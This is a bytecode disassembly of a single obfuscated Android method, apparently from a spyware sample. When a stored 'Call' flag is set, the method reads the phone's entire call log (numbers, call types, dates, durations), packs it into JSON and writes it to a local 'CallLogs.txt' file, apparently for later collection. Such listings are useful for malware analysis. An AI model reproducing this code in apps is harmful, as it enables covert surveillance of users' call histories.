# Lb/b/a/a/d/a;->a()V [access_flags=public]
#
# Parameters:
# local registers: v0...v9
#
# - return:void

a-BB@0x0 : [ a-BB@0x4 ]
	0       (00000000) const-string         v0, 'Call'

a-BB@0x4 : [ a-BB@0x2c a-BB@0x80 ]
	1       (00000004) sget-object          v1, Lcom/mixio/tosh/aprl/aetn/ate;->n Ljava/util/List;
	2       (00000008) invoke-interface     v1, Ljava/util/List;->clear()V
	3       (0000000e) new-instance         v1, Ljava/io/File;
	4       (00000012) sget-object          v2, Lcom/mixio/tosh/aprl/aetn/ate;->c Ljava/io/File;
	5       (00000016) const-string         v3, 'Clist.txt'
	6       (0000001a) invoke-direct        v1, v2, v3, Ljava/io/File;-><init>(Ljava/io/File; Ljava/lang/String;)V
	7       (00000020) invoke-virtual       v1, Ljava/io/File;->isFile()Z
	8       (00000026) move-result          v2
	9       (00000028) if-eqz               v2, +2c
	4:75
	(Ljava/lang/Exception; -> 78 a-BB@0x78)

a-BB@0x2c : [ a-BB@0x38 a-BB@0x80 ]
	10      (0000002c) invoke-virtual       v1, Ljava/io/File;->exists()Z
	11      (00000032) move-result          v2
	12      (00000034) if-eqz               v2, +26
	4:75
	(Ljava/lang/Exception; -> 78 a-BB@0x78)

a-BB@0x38 : [ a-BB@0x4c ]
	13      (00000038) new-instance         v2, Ljava/io/BufferedReader;
	14      (0000003c) new-instance         v3, Ljava/io/FileReader;
	15      (00000040) invoke-direct        v3, v1, Ljava/io/FileReader;-><init>(Ljava/io/File;)V
	16      (00000046) invoke-direct        v2, v3, Ljava/io/BufferedReader;-><init>(Ljava/io/Reader;)V
	4:75
	(Ljava/lang/Exception; -> 78 a-BB@0x78)

a-BB@0x4c : [ a-BB@0x58 a-BB@0x70 ]
	17      (0000004c) invoke-virtual       v2, Ljava/io/BufferedReader;->readLine()Ljava/lang/String;
	18      (00000052) move-result-object   v1
	19      (00000054) if-eqz               v1, +e
	4:75
	(Ljava/lang/Exception; -> 78 a-BB@0x78)

a-BB@0x58 : [ a-BB@0x64 a-BB@0x4c ]
	20      (00000058) invoke-virtual       v1, Ljava/lang/String;->length()I
	21      (0000005e) move-result          v3
	22      (00000060) if-lez               v3, -a
	4:75
	(Ljava/lang/Exception; -> 78 a-BB@0x78)

a-BB@0x64 : [ a-BB@0x4c ]
	23      (00000064) sget-object          v3, Lcom/mixio/tosh/aprl/aetn/ate;->n Ljava/util/List;
	24      (00000068) invoke-interface     v3, v1, Ljava/util/List;->add(Ljava/lang/Object;)Z
	25      (0000006e) goto                 -11
	4:75
	(Ljava/lang/Exception; -> 78 a-BB@0x78)

a-BB@0x70 : [ a-BB@0x80 ]
	26      (00000070) invoke-virtual       v2, Ljava/io/BufferedReader;->close()V
	27      (00000076) goto                 +5

a-BB@0x78 : [ a-BB@0x7a ]
	28      (00000078) move-exception       v1

a-BB@0x7a : [ a-BB@0x80 ]
	29      (0000007a) invoke-virtual       v1, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
	7a:1bd
	(Ljava/lang/Exception; -> 28c a-BB@0x28c)

a-BB@0x80 : [ a-BB@0x92 a-BB@0x2ae ]
	30      (00000080) sget-object          v1, Lcom/mixio/tosh/aprl/aetn/ate;->e Landroid/content/SharedPreferences;
	31      (00000084) const/4              v2, 1
	32      (00000086) invoke-interface     v1, v0, v2, Landroid/content/SharedPreferences;->getInt(Ljava/lang/String; I)I
	33      (0000008c) move-result          v1
	34      (0000008e) if-ne                v1, v2, +110
	7a:1bd
	(Ljava/lang/Exception; -> 28c a-BB@0x28c)

a-BB@0x92 : [ a-BB@0x11c ]
	35      (00000092) iget-object          v1, v9, Lb/b/a/a/d/a;->a Landroid/content/Context;
	36      (00000096) invoke-virtual       v1, Landroid/content/Context;->getContentResolver()Landroid/content/ContentResolver;
	37      (0000009c) move-result-object   v3
	38      (0000009e) sget-object          v4, Landroid/provider/CallLog$Calls;->CONTENT_URI Landroid/net/Uri;
	39      (000000a2) const/4              v5, 0
	40      (000000a4) const/4              v6, 0
	41      (000000a6) const/4              v7, 0
	42      (000000a8) const/4              v8, 0
	43      (000000aa) invoke-virtual/range v3 ... v8, Landroid/content/ContentResolver;->query(Landroid/net/Uri; [Ljava/lang/String; Ljava/lang/String; [Ljava/lang/String; Ljava/lang/String;)Landroid/database/Cursor;
	44      (000000b0) move-result-object   v1
	45      (000000b2) const-string         v3, 'number'
	46      (000000b6) invoke-interface     v1, v3, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
	47      (000000bc) move-result          v3
	48      (000000be) iput                 v3, v9, Lb/b/a/a/d/a;->b I
	49      (000000c2) const-string         v3, 'type'
	50      (000000c6) invoke-interface     v1, v3, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
	51      (000000cc) move-result          v3
	52      (000000ce) iput                 v3, v9, Lb/b/a/a/d/a;->c I
	53      (000000d2) const-string         v3, 'date'
	54      (000000d6) invoke-interface     v1, v3, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
	55      (000000dc) move-result          v3
	56      (000000de) iput                 v3, v9, Lb/b/a/a/d/a;->d I
	57      (000000e2) const-string         v3, 'duration'
	58      (000000e6) invoke-interface     v1, v3, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
	59      (000000ec) move-result          v3
	60      (000000ee) iput                 v3, v9, Lb/b/a/a/d/a;->e I
	61      (000000f2) new-instance         v3, Ljava/io/FileOutputStream;
	62      (000000f6) new-instance         v4, Ljava/io/File;
	63      (000000fa) sget-object          v5, Lcom/mixio/tosh/aprl/aetn/ate;->c Ljava/io/File;
	64      (000000fe) const-string         v6, 'CallLogs.txt'
	65      (00000102) invoke-direct        v4, v5, v6, Ljava/io/File;-><init>(Ljava/io/File; Ljava/lang/String;)V
	66      (00000108) invoke-direct        v3, v4, Ljava/io/FileOutputStream;-><init>(Ljava/io/File;)V
	67      (0000010e) new-instance         v4, Lorg/json/JSONArray;
	68      (00000112) invoke-direct        v4, Lorg/json/JSONArray;-><init>()V
	69      (00000118) iput-object          v4, v9, Lb/b/a/a/d/a;->k Lorg/json/JSONArray;
	7a:1bd
	(Ljava/lang/Exception; -> 28c a-BB@0x28c)

a-BB@0x11c : [ a-BB@0x128 a-BB@0x232 ]
	70      (0000011c) invoke-interface     v1, Landroid/database/Cursor;->moveToNext()Z
	71      (00000122) move-result          v4
	72      (00000124) if-eqz               v4, +87
	7a:1bd
	(Ljava/lang/Exception; -> 28c a-BB@0x28c)

a-BB@0x128 : [ a-BB@0x196 a-BB@0x19c ]
	73      (00000128) iget                 v4, v9, Lb/b/a/a/d/a;->b I
	74      (0000012c) invoke-interface     v1, v4, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
	75      (00000132) move-result-object   v4
	76      (00000134) iput-object          v4, v9, Lb/b/a/a/d/a;->f Ljava/lang/String;
	77      (00000138) iget                 v4, v9, Lb/b/a/a/d/a;->e I
	78      (0000013c) invoke-interface     v1, v4, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
	79      (00000142) move-result-object   v4
	80      (00000144) iput-object          v4, v9, Lb/b/a/a/d/a;->i Ljava/lang/String;
	81      (00000148) iget                 v4, v9, Lb/b/a/a/d/a;->d I
	82      (0000014c) invoke-interface     v1, v4, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
	83      (00000152) move-result-object   v4
	84      (00000154) iput-object          v4, v9, Lb/b/a/a/d/a;->h Ljava/lang/String;
	85      (00000158) iget                 v4, v9, Lb/b/a/a/d/a;->c I
	86      (0000015c) invoke-interface     v1, v4, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
	87      (00000162) move-result-object   v4
	88      (00000164) invoke-static        v4, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
	89      (0000016a) move-result          v4
	90      (0000016c) iput                 v4, v9, Lb/b/a/a/d/a;->g I
	91      (00000170) new-instance         v4, Ljava/util/Date;
	92      (00000174) iget-object          v5, v9, Lb/b/a/a/d/a;->h Ljava/lang/String;
	93      (00000178) invoke-static        v5, Ljava/lang/Long;->valueOf(Ljava/lang/String;)Ljava/lang/Long;
	94      (0000017e) move-result-object   v5
	95      (00000180) invoke-virtual       v5, Ljava/lang/Long;->longValue()J
	96      (00000186) move-result-wide     v5
	97      (00000188) invoke-direct        v4, v5, v6, Ljava/util/Date;-><init>(J)V
	98      (0000018e) iget                 v5, v9, Lb/b/a/a/d/a;->g I
	99      (00000192) if-ne                v5, v2, +5
	7a:1bd
	(Ljava/lang/Exception; -> 28c a-BB@0x28c)

a-BB@0x196 : [ a-BB@0x1ba ]
	100     (00000196) const-string         v5, 'INCOMING '
	101     (0000019a) goto                 +10
	7a:1bd
	(Ljava/lang/Exception; -> 28c a-BB@0x28c)

a-BB@0x19c : [ a-BB@0x1a6 a-BB@0x1ac ]
	102     (0000019c) iget                 v5, v9, Lb/b/a/a/d/a;->g I
	103     (000001a0) const/4              v6, 3
	104     (000001a2) if-ne                v5, v6, +5
	7a:1bd
	(Ljava/lang/Exception; -> 28c a-BB@0x28c)

a-BB@0x1a6 : [ a-BB@0x1ba ]
	105     (000001a6) const-string         v5, 'Missed '
	106     (000001aa) goto                 +8
	7a:1bd
	(Ljava/lang/Exception; -> 28c a-BB@0x28c)

a-BB@0x1ac : [ a-BB@0x1b6 a-BB@0x1be ]
	107     (000001ac) iget                 v5, v9, Lb/b/a/a/d/a;->g I
	108     (000001b0) const/4              v6, 2
	109     (000001b2) if-ne                v5, v6, +6
	7a:1bd
	(Ljava/lang/Exception; -> 28c a-BB@0x28c)

a-BB@0x1b6 : [ a-BB@0x1ba ]
	110     (000001b6) const-string         v5, 'OutGoing '
	7a:1bd
	(Ljava/lang/Exception; -> 28c a-BB@0x28c)

a-BB@0x1ba : [ a-BB@0x1be ]
	111     (000001ba) iput-object          v5, v9, Lb/b/a/a/d/a;->j Ljava/lang/String;
	7a:1bd
	(Ljava/lang/Exception; -> 28c a-BB@0x28c)

a-BB@0x1be : [ a-BB@0x11c ]
	112     (000001be) new-instance         v5, Lorg/json/JSONArray;
	113     (000001c2) invoke-direct        v5, Lorg/json/JSONArray;-><init>()V
	114     (000001c8) new-instance         v6, Lorg/json/JSONObject;
	115     (000001cc) invoke-direct        v6, Lorg/json/JSONObject;-><init>()V
	116     (000001d2) const-string         v7, 'Type'
	117     (000001d6) iget-object          v8, v9, Lb/b/a/a/d/a;->j Ljava/lang/String;
	118     (000001da) invoke-virtual       v6, v7, v8, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	119     (000001e0) const-string         v7, 'Number'
	120     (000001e4) iget-object          v8, v9, Lb/b/a/a/d/a;->f Ljava/lang/String;
	121     (000001e8) invoke-virtual       v6, v7, v8, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	122     (000001ee) const-string         v7, 'Duration'
	123     (000001f2) iget-object          v8, v9, Lb/b/a/a/d/a;->i Ljava/lang/String;
	124     (000001f6) invoke-virtual       v6, v7, v8, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	125     (000001fc) const-string         v7, 'Date'
	126     (00000200) invoke-virtual       v4, Ljava/util/Date;->toString()Ljava/lang/String;
	127     (00000206) move-result-object   v4
	128     (00000208) invoke-virtual       v6, v7, v4, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	129     (0000020e) invoke-virtual       v5, v6, Lorg/json/JSONArray;->put(Ljava/lang/Object;)Lorg/json/JSONArray;
	130     (00000214) new-instance         v4, Lorg/json/JSONObject;
	131     (00000218) invoke-direct        v4, Lorg/json/JSONObject;-><init>()V
	132     (0000021e) invoke-virtual       v4, v0, v5, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	133     (00000224) iget-object          v5, v9, Lb/b/a/a/d/a;->k Lorg/json/JSONArray;
	134     (00000228) invoke-virtual       v5, v4, Lorg/json/JSONArray;->put(Ljava/lang/Object;)Lorg/json/JSONArray;
	135     (0000022e) goto/16              -89
	1be:22d
	(Ljava/lang/Exception; -> 11c a-BB@0x11c)

a-BB@0x232 : [ a-BB@0x2ae ]
	136     (00000232) new-instance         v0, Ljava/lang/StringBuilder;
	137     (00000236) invoke-direct        v0, Ljava/lang/StringBuilder;-><init>()V
	138     (0000023c) iget-object          v1, v9, Lb/b/a/a/d/a;->k Lorg/json/JSONArray;
	139     (00000240) invoke-virtual       v1, Lorg/json/JSONArray;->toString()Ljava/lang/String;
	140     (00000246) move-result-object   v1
	141     (00000248) invoke-virtual       v0, v1, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	142     (0000024e) const/16             v1, 10
	143     (00000252) invoke-virtual       v0, v1, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
	144     (00000258) invoke-virtual       v0, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
	145     (0000025e) move-result-object   v0
	146     (00000260) invoke-static        v0, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
	147     (00000266) move-result-object   v0
	148     (00000268) invoke-virtual       v0, Ljava/lang/String;->getBytes()[B
	149     (0000026e) move-result-object   v0
	150     (00000270) invoke-virtual       v3, v0, Ljava/io/FileOutputStream;->write([B)V
	151     (00000276) new-instance         v0, Lorg/json/JSONArray;
	152     (0000027a) invoke-direct        v0, Lorg/json/JSONArray;-><init>()V
	153     (00000280) iput-object          v0, v9, Lb/b/a/a/d/a;->k Lorg/json/JSONArray;
	154     (00000284) invoke-virtual       v3, Ljava/io/FileOutputStream;->close()V
	155     (0000028a) goto                 +12
	232:289
	(Ljava/lang/Exception; -> 28c a-BB@0x28c)

a-BB@0x28c : [ a-BB@0x2ae ]
	156     (0000028c) move-exception       v0
	157     (0000028e) const-string         v1, 'Error '
	158     (00000292) invoke-static        v1, Lb/a/a/a/a;->a(Ljava/lang/String;)Ljava/lang/StringBuilder;
	159     (00000298) move-result-object   v1
	160     (0000029a) invoke-virtual       v0, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
	161     (000002a0) move-result-object   v0
	162     (000002a2) invoke-virtual       v1, v0, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	163     (000002a8) invoke-virtual       v1, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

a-BB@0x2ae : 
	164     (000002ae) return-void          

